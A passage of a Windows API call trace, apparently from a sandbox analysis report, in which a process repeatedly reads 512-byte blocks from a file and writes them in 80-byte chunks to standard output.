lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.218] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.218] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.219] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.219] ReadFile 
(in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.219] GetFileType (hFile=0x4c) returned 0x1 [0094.219] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.220] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.220] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] GetFileType (hFile=0x4c) returned 0x1 [0094.220] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.220] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, 
lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.221] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.221] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] GetFileType (hFile=0x4c) returned 0x1 [0094.221] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.221] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.222] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.222] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0094.222] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] GetFileType (hFile=0x4c) returned 0x1 [0094.222] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.222] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] 
GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.223] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.223] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | 
out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] GetFileType (hFile=0x4c) returned 0x1 [0094.223] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.223] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, 
lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.224] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.224] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] GetFileType (hFile=0x4c) returned 0x1 [0094.224] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.224] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.225] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) 
returned 1 [0094.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.225] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] GetFileType (hFile=0x4c) returned 0x1 [0094.225] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.225] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.226] GetFileType (hFile=0x4c) returned 0x1 [0094.226] _get_osfhandle (_FileHandle=1) returned 